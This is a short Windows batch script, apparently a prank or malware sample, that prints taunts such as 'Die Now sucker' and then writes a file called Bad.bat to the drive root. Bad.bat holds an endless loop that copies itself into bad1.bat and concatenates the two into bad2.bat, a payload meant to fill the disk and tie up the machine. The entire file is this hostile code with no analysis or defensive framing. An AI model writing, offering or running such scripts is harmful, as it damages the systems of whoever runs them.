@echo off
echo Your need this!!!
echo Die Now sucker............................................
echo :hell > Bad.bat 
echo copy bad.bat bad1.bat >> Bad.bat
echo copy bad.bat+bad1.bat bad2.bat >> Bad.bat
echo goto hell >> Bad.bat
cd\
goto next
:next
echo :hell > Bad.bat
echo copy bad.bat bad1.bat >> Bad.bat
echo copy bad.bat+bad1.bat bad2.bat >> Bad.bat
echo goto hell >> Bad.bat
echo
